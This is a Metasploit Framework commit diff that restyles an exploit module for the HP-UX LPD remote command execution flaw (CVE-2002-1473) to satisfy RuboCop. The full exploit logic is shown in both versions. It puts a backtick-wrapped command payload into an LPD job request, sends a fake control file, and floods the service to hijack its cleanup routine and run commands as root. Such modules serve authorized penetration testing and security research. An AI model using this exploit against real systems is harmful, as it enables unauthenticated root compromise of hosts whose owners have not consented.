modules/exploits/hpux: Resolve RuboCop violations

2025-04-19 23:00:07 +10:00
parent 809d87a96b
commit c3824e2b72
1 changed files with 61 additions and 60 deletions
@@ -3,95 +3,96 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

+require 'English'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'HP-UX LPD Command Execution',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'HP-UX LPD Command Execution',
+        'Description' => %q{
          This exploit abuses an unpublished vulnerability in the
-        HP-UX LPD service. This flaw allows an unauthenticated
-        attacker to execute arbitrary commands with the privileges
-        of the root user. The LPD service is only exploitable when
-        the address of the attacking system can be resolved by the
-        target. This vulnerability was silently patched with the
-        buffer overflow flaws addressed in HP Security Bulletin
-        HPSBUX0208-213.
-      },
-      'Author'         => [ 'hdm' ],
-      'References'     =>
-        [
-          [ 'CVE', '2002-1473'],
-          [ 'OSVDB', '9638'],
-          [ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
-
-        ],
-      'Platform'       => %w{ hpux unix },
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
-          'Space'       => 200,
-          'DisableNops' => true,
-          'BadChars'    => "\x00\x09\x20\x2f",
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl telnet',
-            }
+          HP-UX LPD service. This flaw allows an unauthenticated
+          attacker to execute arbitrary commands with the privileges
+          of the root user. The LPD service is only exploitable when
+          the address of the attacking system can be resolved by the
+          target. This vulnerability was silently patched with the
+          buffer overflow flaws addressed in HP Security Bulletin
+          HPSBUX0208-213.
        },
-      'Targets'        =>
-        [
-          [ 'Automatic Target', { }]
+        'Author' => [ 'hdm' ],
+        'References' => [
+          ['CVE', '2002-1473'],
+          ['OSVDB', '9638'],
+          ['URL', 'https://web.archive.org/web/20041213153521/http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
        ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2002-08-28'
-    ))
+        'Platform' => %w[hpux unix],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Space' => 200,
+          'DisableNops' => true,
+          'BadChars' => "\x00\x09\x20\x2f",
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic perl telnet'
+          }
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2002-08-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )

-    register_options(
-      [
-        Opt::RPORT(515)
-      ])
+    register_options([
+      Opt::RPORT(515)
+    ])
  end

  def exploit
-
    # The job ID is squashed down to three decimal digits
-    jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
+    jid = ($PROCESS_ID % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

    # Connect to the LPD service
    connect

-    print_status("Sending our job request with embedded command string...")
+    print_status('Sending our job request with embedded command string...')
+
    # Send the job request with the encoded command
-    sock.put(
-      "\x02" + rand_text_alphanumeric(3) + jid +
-      "`" + payload.encoded + "`\n"
-    )
+    sock.put("\x02#{rand_text_alphanumeric(3)}#{jid}`#{payload.encoded}`\n")

    res = sock.get_once(1)
-    if !(res and res[0,1] == "\x00")
-      print_status("The target did not accept our job request")
-      return
+    if !(res && res[0, 1] == "\x00")
+      fail_with(Failure::Unknown, 'The target did not accept our job request')
    end

-    print_status("Sending our fake control file...")
-    sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
+    print_status('Sending our fake control file...')
+    sock.put("\x02 32 cfA#{rand_text_alphanumeric(8)}\n")
+
    res = sock.get_once(1)
-    if !(res and res[0,1] == "\x00")
-      print_status("The target did not accept our control file")
-      return
+    if !(res && res[0, 1] == "\x00")
+      fail_with(Failure::Unknown, 'The target did not accept our control file')
    end

-    print_status("Forcing an error and hijacking the cleanup routine...")
+    print_status('Forcing an error and hijacking the cleanup routine...')

    begin
      sock.put(rand_text_alphanumeric(16384))
-      disconnect
-    rescue
+    rescue StandardError
+      # request may fail, this is expected
    end
-
+  ensure
+    disconnect unless sock.nil?
  end
 end